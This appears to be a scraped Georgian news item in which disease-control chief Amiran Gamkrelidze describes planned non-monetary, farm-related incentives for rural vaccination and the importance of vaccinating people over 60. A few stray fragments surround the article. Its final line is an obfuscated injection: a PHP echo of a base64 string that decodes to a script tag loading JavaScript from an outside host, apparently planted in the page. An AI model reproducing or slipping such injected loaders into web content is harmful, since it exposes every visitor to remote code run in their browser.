celsiusi
ავერსი შნაიდერი
დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელის, ამირან გამყრელიძის განცხადებით, ვაქცინაციის წახალისების მიზნით, სოფლად მცხოვრები მოსახლეობისთვის წამახალისებელი ღონისძიებები განიხილება, რაც სასოფლო სამეურნეო სამუშაოებთან არის დაკავშირებული.
 
როგორც დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელმა ამირან გამყრელიძემ საკოორდინაციო საბჭოს სხდომის დასრულებისას აღნიშნა, მნიშვნელოვანია 60 წელს ზემოთ მოსახლეობის აცრა.
 
"გვინდა, ორშაბათიდან მობილური ბრიგადებით და ადგილობრივი ექიმების საშუალებით გავააქტიუროთ აცრები. გვინდა, რომ მოტივაცია გაჩნდეს აცრებზე, დღეს საკოორდინაციო საბჭოზე განხილული იყო რამდენიმე საკითხი. სანამ გადაწყვეტილება არ იქნება, ჯერ ვერ გეტყვით ამ საკითხებზე. სოფლის მოსახლეობაზე განიხილება სპეციფიური წამახალისებელი ღონისძიებები, რაც სასოფლო - სამეურნეო სამუშაოებთან არის დაკავშირებული და არამონეტარულია. ერთ-ერთი მნიშვნელოვანი საკითხია 60 წელს ზემოთ მოსახლეობის აცრა. ჩვენი მასალის საფუძველზე გაანალიზებულია, რომ ინფიცირების მაჩვენებელი ორჯერადად აცრილებში 9-ჯერ ნაკლები გვაქვს, ვიდრე არავაქცინირებულებში“, - აღნიშნავს გამყრელიძე.
 
მან აცრების სტატისტიკაზეც ისაუბრა და აღნიშნა, რომ თუ ამ ტემპით წავედით, სამიზნე მაჩვენებლის მიღწევა, რომ წლის ბოლომდე მოზრდილი მოსახლეობის 60% იყოს აცრილი „კითხვის ნიშნის ქვეშ დადგება“.
1024
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");